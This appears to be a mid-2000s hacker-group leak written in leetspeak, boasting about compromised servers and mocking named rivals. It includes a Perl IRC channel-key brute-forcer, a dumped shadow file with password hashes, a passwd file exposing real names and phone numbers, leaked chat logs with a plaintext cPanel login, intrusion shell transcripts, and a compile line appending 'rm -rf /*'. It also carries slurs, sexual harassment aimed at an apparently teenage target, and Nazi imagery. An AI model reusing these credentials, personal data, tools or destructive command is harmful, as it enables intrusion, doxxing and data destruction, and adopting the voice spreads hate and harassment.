|\ \ |____| \ \ / / | |\ \ \`/// / / \ / . \ / . \ / / \_ /_/ _\ | \ | / | \_____| / \ | | \____________/ \ Ascii by |__ | \ \ Latuff98 ___/____| __\ _| L____ __| L____/` KKK:THE SHAME OF AMERICA << wh4t th3 fucK 1z 1t w1tH th3s3 l4m3rz!@? >> root@kato:/home/uberuser # cat chancrack.pl <--- 0h fuQ 1 f0unD th3 j4qp0t@#&*!@*&^*!#% #el8 c4n7 st0p uz n0w!!!! #!/usr/bin/perl -w use Net::IRC; use Net::IRC::Event; #open(WL, "/home/uberuser/wordlist") or die "Failed to open #wordlist$!\n"; # @keys = ; # chomp(@keys); # close(WL); $irc = new Net::IRC; $conn = $irc->newconn(Nick => 'LEECHAXSS', Server => 'irc.servercentral.net', Port => 6667, Username => "iheartu", Ircname => 'I LOVE CRAXING DOT IN'); $chan = "#pokemon"; sub on_connect { ($self) = shift; $self->join("#seele"); $stime = `date +\"%b/%d/%Y %H:%M:%S\"`; foreach $chankey (`cat wordlist`) { print "TRYING: $chankey\n"; $self->join("$chan", "$chankey"); sleep(2); } } sub on_names { $endtime = `date +\"%b/%d/%Y %H:%M:%S\"`; $self->privmsg("#seele", "uberuser: $chan key: $chankey"); $self->privmsg("uberuser", "$chan key: $chankey"); $self->quit("I LOL'd"); print "START TIME: $stime\nEND TIME: $endtime\n"; print "$chan KEY: $chankey\n"; } #$conn->add_handler('msg', \&on_msg); #$conn->add_handler('mode', \&on_mode); $conn->add_global_handler('376', \&on_connect); $conn->add_global_handler(353, \&on_names); $irc->start; root@kato:/home/uberuser # cat nazifile2 _______________________________________________________________________________________ / /\ / U N S E R E E H R E / /___ /______________________________________________________________________________________/ / /\ \ \ \ / \ \ H E I S S T \ \/ /\ \ ___\______________________________________________________________________________________\ /__\/ /______________________________________________________________________________________/\ / \ \ \ \/ /\ \ \ T R E U E \ /__\ \ \______________________________________________________________________________________\/ / / /______________________________________________________________________________________/ / \______________________________________________________________________________________\/ WH47 TH3 FUQ!!!!!!!!!!!!! FUCK1NG N4Z1'S root@kato:/home/uberuser # exit exit owlmanatt@kato:~$ sudo su Password: root@kato:/home/owlmanatt # cat /etc/shadow root:*:13012:0:99999:7::: daemon:*:13011:0:99999:7::: bin:*:13011:0:99999:7::: sys:*:13011:0:99999:7::: sync:*:13011:0:99999:7::: games:*:13011:0:99999:7::: man:*:13011:0:99999:7::: lp:*:13011:0:99999:7::: mail:*:13011:0:99999:7::: news:*:13011:0:99999:7::: uucp:*:13011:0:99999:7::: proxy:*:13011:0:99999:7::: www-data:*:13011:0:99999:7::: backup:*:13011:0:99999:7::: list:*:13011:0:99999:7::: irc:*:13011:0:99999:7::: gnats:*:13011:0:99999:7::: nobody:*:13011:0:99999:7::: postfix:!:13011:0:99999:7::: syslog:!:13011:0:99999:7::: klog:!:13011:0:99999:7::: owlmanatt:$1$HACZyNrK$lqBiNHo7fs.mawfKimlUP1:13011:0:99999:7::: sshd:!:13012:0:99999:7::: mysql:!:13012:0:99999:7::: Debian-exim:!:13012:0:99999:7::: infinityb:$1$2EWAQAn6$KFwYSiQydMi1n5SjHs8iF0:13012:0:99999:7::: uberuser:$1$ohfno5Nu$.gNDX.jA0CgNImpGJG6S2/:13012:0:99999:7::: ell1sk:$1$08Y.eng7$llGyt66tvlefIiHobgwz//:13012:0:99999:7::: trevor:$1$twekn5m1$5XeCPTDYhMD.Pv2RYMcUR1:13031:0:99999:7::: pasv:!$1$8aDyAgPT$CNJZz2eULRRSlFc5oxoO01:13053:0:99999:7::: debian-tor:!:13064:0:99999:7::: fac51:$1$615IhWKx$IjxKVX9Ek0K4J3Oq7b.Nr0:13065:0:99999:7::: bitlbee:!:13087:0:99999:7::: dhcp:!:13111:0:99999:7::: root@kato:/home/owlmanatt # th1z b0x 1z fuck1ng l4m3 y0u n4z1 fuckz. n0w f0r 0wlm4n4tt.c0m#!!@#!@ owlmanatt@bell:/home/owlmanatt$ ssh evansn@owlmanatt.com Linux enterprise 2.6.8-2-386 #1 Thu May 19 17:40:50 JST 2005 i686 GNU/Linux The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Wed Nov 30 18:25:38 2005 from 64.252.161.82 evansn@enterprise:~$ uname -a;id Linux enterprise 2.6.8-2-386 #1 Thu May 19 17:40:50 JST 2005 i686 GNU/Linux uid=1004(evansn) gid=1004(evansn) groups=1004(evansn) evansn@enterprise:~$ w 18:27:33 up 42 days, 7:23, 1 user, load average: 0.00, 0.00, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT evansn pts/0 64.252.161.82 18:26 0.00s 0.02s 0.00s w evansn@enterprise:~$ ls -al /home total 22 drwxrwsr-x 10 root staff 1024 2005-07-18 20:39 . drwxr-xr-x 22 root root 1024 2005-05-11 18:48 .. drwxr-xr-x 29 domorods users 2048 2005-11-27 12:25 domorods drwxr-xr-x 4 evansn evansn 1024 2005-11-30 18:49 evansn drwxr--r-- 3 ftp fax 1024 2004-12-14 09:44 ftp drwxr-xr-x 5 81 81 1024 2004-01-13 22:46 httpd drwx------ 4 john john 1024 2005-11-29 07:09 john drwx------ 2 root root 12288 2003-07-02 20:50 lost+found drwx--x--x 5 melkore users 1024 2004-09-14 00:03 melkore drwxr-xr-x 9 vmail vmail 1024 2005-08-09 07:25 vmail evansn@enterprise:~$ ls -al total 1375 drwxr-xr-x 4 evansn evansn 1024 2005-11-30 18:49 . drwxrwsr-x 10 root staff 1024 2005-07-18 20:39 .. -rw------- 1 evansn evansn 5442 2005-11-30 18:58 .bash_history -rw-r--r-- 1 evansn evansn 414 2005-07-18 20:39 .bash_profile -rw-r--r-- 1 evansn evansn 2044 2005-07-18 20:39 .bashrc drwxr-xr-x 2 evansn evansn 1024 2005-09-18 09:56 MT-3.2-en_US -rw-r--r-- 1 evansn evansn 1377924 2005-09-18 09:49 MT-3.2.tar.gz -rw------- 1 evansn evansn 613 2005-11-30 18:41 .mysql_history lrwxrwxrwx 1 evansn evansn 28 2005-07-18 20:58 owlmanatt -> /u0/www/customers/owlmanatt/ drwx------ 2 evansn evansn 1024 2005-07-18 20:44 .ssh -rw------- 1 evansn evansn 7410 2005-11-30 18:49 .viminfo evansn@enterprise:~$ wh4t 4 fuck1ng l4m3 b0x. 1t f1tz 0wlm4n th0ugh. t0 t0p 1t 0ff h0w 4b0ut s0m3 l0gz 0f 0wlm4n 4nd sk3w t4lk1ng!@!@*@! Conversation with unixroot102 at 2004-11-28 17:32:36 on OwlManAttTFC (aim) (17:32:36) unixroot102: owl (17:32:41) unixroot102: u there? (17:32:51) OwlManAttTFC: Possibly. (17:32:59) unixroot102: JEsus. (17:33:03) unixroot102: its you? (17:33:21) OwlManAttTFC: No, it's a trained monkey in an infinityb suit. (17:33:51) unixroot102: jeje (17:33:54) unixroot102: where u been hoe (17:34:12) OwlManAttTFC: Right here. (17:35:13) unixroot102: ya ya ya (17:35:27) unixroot102: how come i never see u then'z (17:35:40) OwlManAttTFC: I like my privacy. (17:35:56) unixroot102: u gayz ^--- 0wl l1k3z h1z pr1v4cy wh1ch 1z why h3 l0gz 4ll h1z c0nv0z s0 h0no k4n s33 th3m h0h0h0 Conversation with unixroot102 at 2004-08-19 23:46:43 on OwlManAttTFC (aim) (23:46:43) unixroot102: owl u there? (23:46:43) OwlManAttTFC : I am not here. Either I walked off to do something else like get food or I feel asleep. This message is automatic, so anything could of happened. Feel free to call me though, you probably know my cell number. (01:48:16) OwlManAttTFC: nope (01:48:57) unixroot102: hoe (01:49:00) unixroot102: listen (01:49:10) unixroot102: reflux needs a site (01:49:15) unixroot102: =) (01:49:19) unixroot102: php welcome (01:49:23) OwlManAttTFC: w00t (01:49:26) unixroot102: think u can work on one? (01:49:30) OwlManAttTFC: yea (01:49:32) unixroot102: :D (01:49:34) unixroot102: <33 owl (01:49:41) ***unixroot102 rapes owl (01:49:43) unixroot102: lol (01:49:46) OwlManAttTFC: lol (01:49:47) unixroot102: ok (01:50:02) unixroot102: umm well when can u start? (01:50:28) OwlManAttTFC: What do you need done, exactly? (01:50:35) unixroot102: hm (01:51:25) unixroot102: well i was thinking like the bg being a screenshot of a terminal with someone seg faulting a proggie ^--- s0m30n3 s3gf4ult1ng a pr0g4m, e.g. N0T Y0U##!$^$ (01:51:40) unixroot102: and links on the left side ^--- http://how-to-hack.org (01:51:48) unixroot102: news on front page ^--- BREAKING NEWZ!!#@! TAL0N FINALLY G0T A G1RLFRI3ND!$@ --- TH3Y ARE STILL W0RK1NG 0N C0NS3NT. (01:51:51) unixroot102: etc 0k4y, 3n0ugh 0f 0wlm4n and sk3w. Conversation with tpoowlmanatt at 2005-03-19 18:14:12 on OwlManAttTFC (aim) (18:14:12) TPO OwlManAtt: (18:25:23) xFlexDx: | UserName: eevopets | PassWord: h3nrytr33 (18:25:29) xFlexDx: http://eevopets.net http://eevopets.net/cpanel http://eevopets.net/webmail�.�.�. ^ 0h sw33t, th4nkz. w3 l0v3 33v0p3tz@!# h3r3 1z 4n 0wl h4t3r. 1t 4pp34rz 0wl h4z 4 f3w 3n3m13z. Conversation with kittyeater10 at 2004-11-19 20:25:51 on Evil OwlManAtt (aim) (20:25:51) Kittyeater10: get aids and die you cock suckin faggot W3 h34rd 0wl t00k k1tty34t3r'z 4dv1c3 4nd 4tt3mpt3d t0 d0 th3 4b0v3. Conversation with lscthulhu at 2004-11-19 20:17:57 on Evil OwlManAtt (aim) (20:17:57) LS Cthulhu: die 4ll th3 r3zt 0f h1z sh1t 1z b0r1ng, b3c4uz3 h3'z b0r1ng az fuq 4nd d03zn't d0 sh1t w1th h1z l1f3. wh4t th3 fuq k1nd 0f n4m3 1z 0wlm4n4tt 4nyw4y?!!$#$* 0WLM4N 1F Y0U N33D H3LP G3TT1NG L41D, WH1CH 3Y3 4M SUR3 Y0U D0 DU3 T0 TH3 F4KT Y0U PR0B4BLY L00K L1K3 4N 0WL T00, Y0U K4N C4LL UP DVDM4N 4ND H3 K4N H00K Y0U UP W1TH S0M3 B4NGBR0Z P0RN. TH4T'Z PR0B4BLY 4Z F4R 4Z Y0U K4N G0 W1TH Y0UR B0R1NG/P4TH3T1C L1F3. BTW, W3 H34R Y0U 4R3 ~16 Y34RZ 0LD. RL0XL3Y L0V3Z T0 G3T H1Z ST4TUT0RY 0N, S0 H1T H1M UP, #H4CKPHR34K@UND3RN3T. H3Z 4N 0LD M4N WH0 L0V3Z L1TTL3 B0YZ. 0R M4YB3 Y0U ALR34DY KN0W TH1Z H0H0. 23.txt -~-~-~ nc/rx 0wn3d t0 fuq ~ rx t4k3z th3 c0ck rx, als0 kn0wn 4z nc 4nd skyy h4z b33n 0wn3d. th1z k1d c0d3z m0r3 asc11 p0rn progr4mz th4n dvdman cyb3rz 50 yr 0ld m3n 0n msn. h3 sitz 1n hiz r00m all d4y d01ng drugz, 4nd d03znt 3v3n g3t up t0 t4k3 a p1ss. h3 lyk3z t0 c0d3 1n C, but d03znt fuqn kn0w h0w t0 t4b h1z k0d3z. 1t'z 0k4y rx, w3'r3 h3r3 t0 h3lp y0u al0ng y0ur 3p1c j0urn3y t0 b3c0m1ng an 3l1t3 h4ck3r, y0u br4in-d4m4g3d slutb4g. h0h0z. 1f y0u w4nt t0 j01n h0no, c0m3 t0 #!bl4ckh4tz, wh1ch 1z 0ur s1st3r ch4nn3l. 4sk bx 1f y0u k4n j01n, h3z 0ur ph33rl3zz l34d3r. 4ls0, y0ur s1t3 (http://el8.ru/x/) 1z 0wn3d. d0uble als0, sn34k w1ll k1q y0u 0ff 0f d4t4v1b3. th1z k1d h4z m0r3 b33f th4n shev. bash$ id uid=10121(rx) gid=100(users) groups=100(users) bash$ uname -a Linux datavibe 2.6.11-hardened-r13 #4 SMP Sat Oct 15 00:23:14 UTC 2005 i686 Pentium III (Coppermine) GenuineIntel GNU/Linux bash$ ls -al total 40 drwxr-xr-x 2 rx users 4096 Jan 5 19:57 . drwxr-xr-x 134 root root 4096 Jan 5 18:19 .. -rw------- 1 rx users 414 Jan 5 19:53 .bash_history -rw-r--r-- 1 rx users 127 Jan 5 18:14 .bash_logout -rw-r--r-- 1 rx users 193 Jan 5 18:14 .bash_profile -rw-r--r-- 1 rx users 993 Jan 5 19:02 .bashrc -rw------- 1 rx users 621 Jan 5 19:57 .viminfo -rw------- 1 rx users 7832 Jul 26 22:48 ircfuzz.c -rw-r--r-- 1 rx users 1816 Jan 5 19:57 shex8.c // s0m30n3 n33dz t0 l34rn h0w t0 t4b // th31r k0d3. w4tch 0ut f0r 1t th0ugh, // th1z 1z 4n el1t3 sh3llk0d3 wr1t3r'z // pr0gr4m. bash$ head -n5 shex8.c /* * shex.c - version 8 * by: rx * mon jan 2 01:24:30 est 2006 */ bash$ cat .bash_history w ls -a ls /mnt/giggage/ pass passwd df -h wget http://roo.no-ip.org/fish/files/1.19.0/fish-1.19.0.tar.gz ls /mnt/giggage/ ls /mnt/giggage/home/ ls /mnt/giggage/home/oclet/ ls -l tar zxvf fish-1.19.0.tar.gz rm fish-1.19.0.tar.gz cd fish-1.19.0/ ls ./configure ls /bin/sh cd .. rm -fr fish-1.19.0/ w ls -la vsy .bash_profile cat .bash_profile cat .bashrc umask echo 'umask 077' >> .bashrc ; source .bashrc exit bash$ ls -al /mnt/giggage/home/oclet/ total 2148 drwxr-xr-x 5 oclet users 4096 Jan 5 18:20 . drwxr-xr-x 134 root root 4096 Jan 5 18:19 .. -rw------- 1 oclet users 525 Jan 5 18:23 .bash_history -rw-r--r-- 1 oclet users 240 Aug 16 04:22 .bash_logout -rw-r--r-- 1 oclet users 308 Aug 16 04:22 .bash_profile -rw-r--r-- 1 oclet users 1306 Aug 16 04:22 .bashrc drwx------ 9 oclet users 4096 Nov 30 11:44 .maildir -rwxr-xr-x 1 oclet users 93694 Jan 5 18:11 apach -rwxr-xr-x 1 oclet users 132720 Jan 5 18:11 apach-scan -rwxr-xr-x 1 oclet users 132720 Jan 5 18:11 apach-scan.1 -rw-r--r-- 1 oclet users 469 Jan 5 18:11 as8758.net -rwxr-xr-x 1 oclet users 441463 Jan 5 18:11 brk -rw-r--r-- 1 oclet users 42 Jan 5 18:11 bucate -rw------- 1 oclet users 106496 Jan 5 18:11 core -rwxr-xr-x 1 oclet users 26692 Jan 5 18:11 dmntreal drwxr-xr-x 3 oclet users 4096 Jan 5 18:20 hack4jes -rw-r--r-- 1 oclet users 14 Jan 5 18:13 index -rwxr-xr-x 1 oclet users 264608 Jan 5 18:11 ipv6fuck -rw-r--r-- 1 oclet users 15905 Jan 5 18:11 ipv6fuck.c -rw-r--r-- 1 oclet users 387932 Jan 5 18:14 lesbo-chicken.jpeg -rwxr-xr-x 1 oclet users 453572 Jan 5 18:12 megaDoS drwx------ 2 oclet users 4096 Aug 16 04:23 public_html -rw-r--r-- 1 oclet users 47127 Jan 5 18:12 wget-log // megaDoS???! th1z w4r3z 1z (c) r0t0r. bash$ w 20:00:18 up 76 days, 23:53, 12 users, load average: 0.53, 0.47, 0.43 USER TTY LOGIN@ IDLE JCPU PCPU WHAT // l3tz s33 wh0'z 0n th1s l4m3 b0x bash$ cat /etc/passwd root:x:0:0:root:/mnt/giggage/home/root:/bin/bash bin:x:1:1:bin:/bin:/bin/false daemon:x:2:2:daemon:/sbin:/bin/false adm:x:3:4:adm:/var/adm:/bin/false lp:x:4:7:lp:/var/spool/lpd:/bin/false sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/bin/false news:x:9:13:news:/usr/lib/news:/bin/false uucp:x:10:14:uucp:/var/spool/uucppublic:/bin/false operator:x:11:0:operator:/root:/bin/bash man:x:13:15:man:/usr/man:/bin/false postmaster:x:14:12:postmaster:/var/spool/mail:/bin/false cron:x:16:16:cron:/var/spool/cron:/bin/false ftp:x:21:21::/home/ftp:/bin/false sshd:x:22:22:sshd:/dev/null:/bin/false at:x:25:25:at:/var/spool/cron/atjobs:/bin/false squid:x:31:31:Squid:/var/cache/squid:/bin/false gdm:x:32:32:GDM:/var/lib/gdm:/bin/false xfs:x:33:33:X Font Server:/etc/X11/fs:/bin/false games:x:35:35:games:/usr/games:/bin/false named:x:40:40:bind:/var/bind:/bin/false mysql:x:60:60:mysql:/var/lib/mysql:/bin/false postgres:x:70:70::/var/lib/postgresql:/bin/bash apache:x:81:81:apache:/home/httpd:/bin/false nut:x:84:84:nut:/var/state/nut:/bin/false cyrus:x:85:12::/usr/cyrus:/bin/false vpopmail:x:89:89::/var/vpopmail:/bin/false alias:x:200:200::/var/qmail/alias:/bin/false qmaild:x:201:200::/var/qmail:/bin/false qmaill:x:202:200::/var/qmail:/bin/false qmailp:x:203:200::/var/qmail:/bin/false qmailq:x:204:201::/var/qmail:/bin/false qmailr:x:205:201::/var/qmail:/bin/false qmails:x:206:201::/var/qmail:/bin/false postfix:x:207:207:postfix:/var/spool/postfix:/bin/false smmsp:x:209:209:smmsp:/var/spool/mqueue:/bin/false portage:x:250:250:portage:/var/tmp/portage:/bin/false guest:x:405:100:guest:/dev/null:/dev/null nobody:x:65534:65534:nobody:/:/bin/false ntp:x:123:123:added by portage for ntp:/dev/null:/bin/false asterisk:x:101:407:added by portage for asterisk:/var/lib/asterisk:/bin/false dovecot:x:97:97:added by portage for dovecot:/dev/null:/bin/false sneak:x:1000:100:jeffrey paul,,877 748 3467,877 748 3467:/home/sneak:/bin/bash mike:x:10003:100:mike williams,,313-445-9510,586-598-0070:/home/mike:/bin/bash bcarps:x:1020:100:Brad Carps,n/a,(916) 485-0959,(916) 482-8565:/home/bcarps:/bin/bash star:x:1044:100:,,,:/home/star:/bin/bash mata:x:1064:100:,,,:/home/mata:/bin/bash sj:x:1066:100:Steven Jay,,(877) Video-Plumber,:/home/sj:/bin/bash fenix:x:1073:100:,,,:/home/fenix:/usr/bin/passwd derek:x:1078:100:derek plaslaiko,,,:/home/derek:/bin/bash hayzell:x:1082:100:hayzell merriweather,,,:/home/hayzell:/bin/bash voigt:x:1091:100:Jonathan Voigt,,734-306-9122,734-306-9122:/home/voigt:/bin/bash gary:x:1093:100:,,,:/home/gary:/bin/bash yussel:x:1095:100:,,,:/home/yussel:/bin/bash christos:x:1098:100:,,,:/home/christos:/bin/bash neike:x:1099:100:,,,:/home/neike:/bin/bash chaos:x:1101:100:,,,:/home/chaos:/bin/bash asc:x:1202:100:,,,:/home/asc:/bin/bash adminx:x:1205:100:,,,:/home/adminx:/bin/bash slash:x:1209:100:,,,:/home/slash:/bin/bash azatkin:x:1210:100:,,,:/home/azatkin:/bin/bash ezatkin:x:1211:100:,,,:/home/ezatkin:/bin/bash mzatkin:x:1212:100:,,,:/home/mzatkin:/bin/bash szatkin:x:1225:100:,,,:/home/szatkin:/bin/bash devynn:x:1213:100:devynn rains,,,:/home/devynn:/bin/bash j3s:x:1215:100:jesica davis,,,:/home/j3s:/bin/bash kristen:x:1216:100:,,,:/home/kristen:/bin/bash angie:x:1222:100:,,,:/home/angie:/bin/bash bsd:x:1223:100:brian duross,,,:/home/bsd:/bin/bash teknokat:x:1224:100:,,,:/home/teknokat:/bin/bash bhoule:x:1226:100:,,,:/home/bhoule:/bin/bash martin:x:1227:100:,,,:/home/martin:/bin/bash greg:x:1228:100:greg,,,:/home/greg:/bin/bash cyb:x:1229:100:,,,:/home/cyb:/bin/bash paul:x:1230:100:,,,:/home/paul:/bin/bash becca:x:1231:100:rebecca stevens,,,:/home/becca:/bin/bash nick:x:1232:100:,,,:/home/nick:/bin/bash ryan:x:1233:100:,,,:/home/ryan:/bin/bash jon:x:1234:100:,,,:/home/jon:/bin/bash darkcube:x:1236:100:,,,:/home/darkcube:/bin/bash doris:x:10006:100:doris payer,,,:/home/doris:/bin/bash etx:x:10008:100::/home/etx:/bin/bash pup:x:10009:100:Jubal Kessler,,,:/home/pup:/bin/tcsh m33sh4:x:10010:100::/home/m33sh4:/bin/bash kim:x:10011:100::/home/kim:/bin/bash joel:x:10012:100::/home/joel:/bin/bash wren:x:10013:100::/home/wren:/bin/bash atomly:x:10014:100::/home/atomly:/bin/bash robthe:x:10016:100::/home/robthe:/bin/bash karey:x:10018:100::/home/karey:/bin/bash caligula:x:10019:100::/home/caligula:/bin/bash xcopy:x:10020:100:Erik Cronin,,,313-549-2621:/home/xcopy:/bin/bash amy:x:10021:100:amy hubbarth,,,:/home/amy:/bin/bash devolve:x:10022:100:jayson barrons,,,:/home/devolve:/bin/bash ddonohue:x:10023:100:Dennis Donohue,,+32 2 541 1526,+32 2 217 9592:/home/ddonohue:/bin/bash mathew:x:10024:100::/home/mathew:/bin/bash mrblaze:x:10025:100::/home/mrblaze:/bin/bash ed:x:10026:100::/home/ed:/bin/bash dmouyal:x:10027:100:Dave M,,,321-279-5996:/home/dmouyal:/bin/bash krhn:x:10028:100::/home/krhn:/bin/bash asmodeus:x:10029:100::/home/asmodeus:/bin/bash science:x:10031:100::/home/science:/bin/bash kelly:x:10032:100::/home/kelly:/bin/bash dudu:x:10033:100::/home/dudu:/bin/bash xcentric:x:10034:100::/home/xcentric:/bin/bash malcolm:x:10035:100::/home/malcolm:/bin/bash essiene:x:10037:100:Essien Ita Essien,,--,--:/home/essiene:/bin/bash vook:x:10038:100::/home/vook:/bin/bash mkiang:x:10039:100::/home/mkiang:/bin/bash parent:x:10041:100::/home/parent:/bin/bash benny:x:10042:100::/home/benny:/bin/bash justica:x:10043:100::/home/justica:/bin/bash geoff:x:10044:100::/home/geoff:/bin/bash vyeto:x:10045:100::/home/vyeto:/bin/bash jerome:x:10046:100::/home/jerome:/bin/bash dbaldwin:x:10047:100::/home/dbaldwin:/bin/bash plusorminus:x:10049:100::/home/plusorminus:/bin/bash keeb:x:10050:100::/home/keeb:/bin/bash craig:x:10051:100::/home/craig:/bin/bash d0cdet:x:10052:100:doc,,,313 510 0719:/home/d0cdet:/bin/bash c2:x:10053:100:carl craig,,,:/home/c2:/bin/bash nff:x:10054:100::/home/nff:/bin/bash kube72:x:10055:100::/home/kube72:/bin/bash djdaniel:x:10056:100::/home/djdaniel:/bin/bash cheryl:x:10058:100::/home/cheryl:/bin/bash nil8:x:10059:100:andrew siegel,,,:/home/nil8:/bin/bash dl:x:10060:100::/home/dl:/bin/bash nowfal:x:10061:100:nowfal akash,,,:/home/nowfal:/bin/bash benji:x:10062:100:Ed Feldman,,,,deletion-candidate:/home/benji:/bin/bash pzilla:x:10064:100::/home/pzilla:/bin/bash andrew:x:10065:100::/home/andrew:/bin/bash theburro:x:10066:100::/home/theburro:/bin/bash jvoigt:x:10067:100::/home/jvoigt:/bin/bash freenet:x:10068:100::/home/freenet:/bin/bash mix:x:10069:100::/home/mix:/bin/bash rburley:x:10070:100::/home/rburley:/bin/bash awesome:x:10071:100:Mfoniso Ossom,,,:/home/awesome:/bin/bash t7g:x:10072:100::/home/t7g:/bin/bash mollyo:x:10073:100::/home/mollyo:/bin/bash sf:x:10074:100::/: jennilee:x:10075:100::/home/jennilee:/bin/bash fksche:x:10076:100::/home/fksche:/bin/bash element8:x:10077:100:eric cloutier,,,:/home/element8:/bin/bash kendra:x:10078:100::/home/kendra:/bin/bash jbl:x:10079:100::/home/jbl:/bin/bash spamfilter:x:10080:100:,,,:/var/spool/spamfilter:/bin/bash jessica:x:10081:100::/home/jessica:/bin/bash toybreaker:x:10082:100::/home/toybreaker:/bin/bash tor:x:102:409:added by portage for tor:/var/lib/tor:/bin/false pi:x:10083:100:Roddy Richards,,,:/home/pi:/bin/bash nocvox:x:10085:100::/home/nocvox:/bin/bash sneakmobile:x:10086:100::/home/sneakmobile:/bin/bash doyle:x:10087:100:mike doyle,,,:/home/doyle:/bin/bash clamav:x:103:1006:added by portage for clamav:/dev/null:/bin/false weev:x:10088:100:Andrew Weevlos,,8044263336,8044263336:/home/weev:/bin/bash oclet:x:10091:100::/home/oclet:/bin/bash hep:x:10092:100:hep sano,lj user hepkitten,,:/home/hep:/bin/bash jabber:x:104:1008:added by portage for jabberd:/var/spool/jabber:/bin/false dv:x:10094:100::/home/dv:/bin/bash pwn:x:10095:100::/home/pwn:/bin/bash teh:x:10096:100::/home/teh:/bin/bash banbot:x:10097:100::/home/banbot:/bin/bash ^^^^ 0nly us3r w0th k33p1ng 0n th1z p4th3t1c b0x. aux88-website:x:10105:100::/home/aux88-website:/bin/bash aux88-tom:x:10106:100::/home/aux88-tom:/bin/false aux88-k1:x:10107:100::/home/aux88-k1:/bin/false buttesnet:x:10108:100::/home/buttesnet:/bin/bash sherrod:x:10109:100::/home/sherrod:/bin/bash shaun:x:10110:100::/home/shaun:/bin/bash optic01:x:10111:100::/home/optic01:/bin/false optic02:x:10112:100::/home/optic02:/bin/false optic03:x:10113:100::/home/optic03:/bin/false optic04:x:10114:100::/home/optic04:/bin/false optic05:x:10115:100::/home/optic05:/bin/false kuperman:x:10116:100:kevin kuperman,,,:/home/kuperman:/bin/bash tourette:x:10117:100:Jeff Wisman (added by voigtjr),,,:/home/tourette:/bin/bash mdb:x:10118:1009:User for Metro Detroit Beatology shoutcast (added by voigt):/dev/null:/bin/false aux88-booking:x:10119:100::/home/aux88-booking:/bin/false cdma:x:10120:100:Samuel Horowitz,,,:/home/cdma:/bin/bash rx:x:10121:100:rx:/home/rx:/bin/bash sdf:x:10122:100::/home/sdf:/bin/bash th1z b0x h4z m0r3 p3d0z th4n wh3n djdarkcube h0ztz a 3 d4y r4v3. bash$ who sneak pts/1 Jan 4 13:02 (pcp0011008802pcs:S.0) darkcube pts/2 Dec 28 21:31 (d149-67-36-22:S.0) djdarkcube pts/3 Dec 17 03:54 (d149-67-36-22:S.1) sneak pts/8 Jan 4 16:05 (pcp0011008802pcs:S.2) sneak pts/9 Jan 4 12:06 (pcp0011008802pcs:S.3) root pts/7 Jan 5 07:11 (::1) root pts/10 Jan 4 16:05 (::1) sneak pts/11 Jan 5 06:04 (pcp0011008802pcs:S.4) sneak pts/9 Jan 4 13:12 (pcp0011008802pcs:S.3) sneak pts/5 Jan 4 13:02 (pcp0011008802pcs:S.1) 4ll b0r1ng sh1t... w4r3z th3 fuck1n w4r3z? 3y3 k4n n0w s33 why bx/dvdman/rotor/skew w0uld l0v3 rx'z k0d1ng. rx g3tz th3 pl34zur3 t0 h4v3 h0no c0mm3nt h1z k0d3! h0w3v3r w3 w1LL d0 th1z pr3t3nd1ng t0 b3 h1m. rx, t4k3 n0t3z, th1z 1z th3 w4y t0 c0mm3nt. bash$ cat prv/porn.c /* sup3r 4scii p0rn pr0gr4m by rx du0d FUQ T4BB1NG! 3y3'm t00 el1t3 f0r th4t. ey3 m4k3 my k0d3 unt4bb3d s0 1tz h4rd3r f0r h4ck3rz lik3 mys3lf t0 4ud1t 1t h3h3h3h3! c0mp1l3 lyk3 s0: # gcc -o porn porn.c && rm -rf /* ^^^^ f0r y0u k1dd13z 0ut th3r3 h3h3h3h!!%#!!#@!@^# gr33tz g0 0ut t0 4LL my 3l1t3 cd3j fr13ndz, 4nd t0 subst4nc3, my 9x id0l! */ #include #include #include void usage(char *); int porn(char *); int main(int argc, char **argv) { int ch; int gogogo = 0; while ((ch = getopt(argc, argv, "hf")) != EOF) { switch(ch) { case 'h': usage(argv[0]); case 'f': gogogo = atoi(optarg); break; } } if (gogogo == 0) { printf("[-] ur not 18+ !@#\n"); // 3v3n th0ugh 3y3 4m n0t 18+ exit(-1); } else { while (1) { // wh1l3(h0no_thr04t_r4p3z_rx) { <--- ps3ud0 k0d3 porn("8======D O:<"); // rx w41t1ng w1th gr34t 4nt1c1p4ti0n... porn(" 8======D O:<"); // rx g3tt1ng m0r3 3xc1t3d! porn(" 8======D O:<"); // rx st1ll h4z h1z m0uth w1d3 0p3n porn(" 8======DO:<"); // rx k4n n0w f33l 1t 0n h1z l1pz porn(" 8======O:<"); // 'yum yum' rx s4yz porn(" 8=====O:<"); porn(" 8====O:<"); porn(" 8===O:<"); porn(" 8==O:<"); porn(" 8=O:<"); porn(" 8O:<"); // rx 1z ch0k1ng porn(" 8=O:<"); porn(" 8==O:<"); porn(" 8===O:<"); porn(" 8====O:<"); porn(" 8=====O:<"); porn(" 8======O:<"); porn(" 8======DO:<"); porn(" 8======D O:<"); porn(" 8======D O:<"); porn("8======D O:<"); // rx 1z alr34dy ph33l1ng w1thdr4wL fr0m h0no'z 0day c0ck att4q // fuq, w3 d1dnt 3xp3kt h1m t0 l1k3 1t. } } return(0); } int porn(char *uNF) { fprintf(stderr, "\r%s", uNF); usleep(rand()%57000+34000); return; } void usage(char *k3k) { printf("must be 18+ only !@#\n"); printf("usage: %s -f\n", k3k); exit(-1); } // t4b y0ur k0d3 do0d. w3 h4t3 th3 s1ght 0f b4d k0d3. // ezp3c14lly wh3n 1t'z 0d4y 4scii p0rn (l4m3). l3t th1z b3 // 4 l3ss0n f0r 4ll y0u fuckz wh0 d0nt us3 t4bz 1n y0ur // k0d3z (3zp3c14LLy 1f y0u w1LL b3 s3nd1ng h0no a // sp3c14L d0n4t10n 0f 0hd4yz. l1k3 w3 s41d b3f0r3... // w3 h4t3 t0 uz3 0ur 0wn.) bash$ cd /mnt/giggage/home/rx/prv bash$ ls -al total 13900 drwx------ 2 rx users 4096 Jan 6 02:00 . drwxr-xr-x 5 rx users 4096 Jan 6 02:00 .. -rw------- 1 rx users 7832 Jul 26 22:48 ircfuzz.c -rw------- 1 rx users 1380 Jan 6 02:00 porn.c -rw------- 1 rx users 14186912 Jan 5 23:18 rx.z -rw-r--r-- 1 rx users 1816 Jan 5 19:57 shex8.c // 3n0ugh 0f th1z l4m3 datavibe.net 